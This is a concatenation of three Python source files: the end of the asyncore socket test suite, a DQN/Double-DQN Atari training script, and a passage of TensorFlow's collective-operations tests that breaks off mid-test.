server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
                self.skipTest("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@threading_helper.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
threading_helper.join_thread(t)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (socket_helper.HOST, 0)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (socket_helper.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = os_helper.TESTFN
def tearDown(self):
os_helper.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
run_dqn_atari.py
|
import argparse
import gym
from gym import wrappers
import os
import time
import random
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from multiprocessing import Process
import dqn
from dqn_utils import *
from atari_wrappers import *
def atari_model(img_in, num_actions, scope, reuse=False):
# as described in https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
# original architecture
out = layers.convolution2d(out, num_outputs=32, kernel_size=8, stride=4, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=4, stride=2, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=3, stride=1, activation_fn=tf.nn.relu)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
out = layers.fully_connected(out, num_outputs=512, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return out
def atari_learn(env,
session,
double,
logdir,
seed,
num_timesteps):
# This is just a rough estimate
num_iterations = float(num_timesteps) / 4.0
lr_multiplier = 1.0
lr_schedule = PiecewiseSchedule([
(0, 1e-4 * lr_multiplier),
(num_iterations / 10, 1e-4 * lr_multiplier),
(num_iterations / 2, 5e-5 * lr_multiplier),
],
outside_value=5e-5 * lr_multiplier)
optimizer = dqn.OptimizerSpec(
constructor=tf.train.AdamOptimizer,
kwargs=dict(epsilon=1e-4),
lr_schedule=lr_schedule
)
def stopping_criterion(env, t):
# notice that here t is the number of steps of the wrapped env,
# which is different from the number of steps in the underlying env
return get_wrapper_by_name(env, "Monitor").get_total_steps() >= num_timesteps
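    # Epsilon-greedy exploration schedule: anneal from 1.0 to 0.1 over the first 1M steps,
    # then to 0.01 by num_iterations / 2, holding 0.01 afterwards.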
exploration_schedule = PiecewiseSchedule(
[
(0, 1.0),
(1e6, 0.1),
(num_iterations / 2, 0.01),
], outside_value=0.01
)
dqn.learn(
env=env,
q_func=atari_model,
optimizer_spec=optimizer,
session=session,
exploration=exploration_schedule,
stopping_criterion=stopping_criterion,
replay_buffer_size=1000000,
batch_size=32,
gamma=0.99,
learning_starts=50000,
learning_freq=4,
frame_history_len=4,
target_update_freq=10000,
grad_norm_clipping=10,
double_q=double,
logdir=os.path.join(logdir,'%d'%seed)
)
env.close()
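# Helper that lists the GPU devices visible to TensorFlow (used for the log line in get_session).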
def get_available_gpus():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.physical_device_desc for x in local_device_protos if x.device_type == 'GPU']
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
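# Reset the default graph and create a TF session restricted to single-threaded op execution,
# with GPU memory growth enabled.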
def get_session():
tf.reset_default_graph()
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=1,
intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True
session = tf.Session(config=tf_config)
print("AVAILABLE GPUS: ", get_available_gpus())
return session
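# Seed the environment and wrap it with a Gym Monitor (videos/statistics) plus the DeepMind
# Atari preprocessing wrappers.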
def get_env(task, seed):
    env = task  # use the env created from --env_name in main() instead of hard-coding Pong
set_global_seeds(seed)
env.seed(seed)
expt_dir = '/tmp/hw3_vid_dir2/'
env = wrappers.Monitor(env, os.path.join(expt_dir, "gym"), force=True)
env = wrap_deepmind(env)
return env
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env_name', type=str, default='PongNoFrameskip-v4')
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
processes = []
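    # Launch one training process per configuration: Double DQN (double=True) and vanilla DQN (double=False).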
for double in [True, False]:
def train_func():
alg_name = 'ddqn' if double else 'dqn'
logdir = args.env_name + '_' + alg_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
# Get Atari games.
task = gym.make(args.env_name)
# Run training
seed = random.randint(0, 9999)
print('random seed = %d' % seed)
env = get_env(task, seed)
session = get_session()
atari_learn(env, session, double, logdir, seed, num_timesteps=2e8)
p = Process(target=train_func)
p.start()
processes.append(p)
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
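# Parameter grids shared by the test classes below: CPU tests use RING only; GPU tests cover
# RING and NCCL and require two GPUs.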
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.combine(collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2', CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2', CollectiveOpsV2.all_gather)
])
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager',
max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication,
max_subdivs_per_device):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
if max_subdivs_per_device == -1:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
else:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication,
max_subdivs_per_device=max_subdivs_per_device)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
def testReduce(self):
device0 = '/device:GPU:0'
device1 = '/device:GPU:1'
group_size = 2
group_key = 100
instance_key = 100
results = []
def all_reduce(device):
@def_function.function(jit_compile=True)
def f():
return _collective_ops.all_reduce_v2([1.], group_size, group_key,
instance_key)
with ops.device(device):
results.append(f())
t0 = threading.Thread(target=all_reduce, args=(device0,))
t1 = threading.Thread(target=all_reduce, args=(device1,))
t0.start()
t1.start()
t0.join()
t1.join()
self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
    # Do not abort if there are no active collective ops. There could be
    # exceptions like EOF which we expect users to catch; aborting collective
    # ops on every op error would interfere with that workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
    # Abort v1 collective ops if there are active collective ops at the time of
    # an op error. This is because collective ops cannot be cancelled, and an op
    # error may leave running collective ops hanging.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
    # Do not abort v2 collective ops even if there are active collective ops at
    # the time of an op error. We rely on cancellation to terminate active
    # collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testCancelDuringParamResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
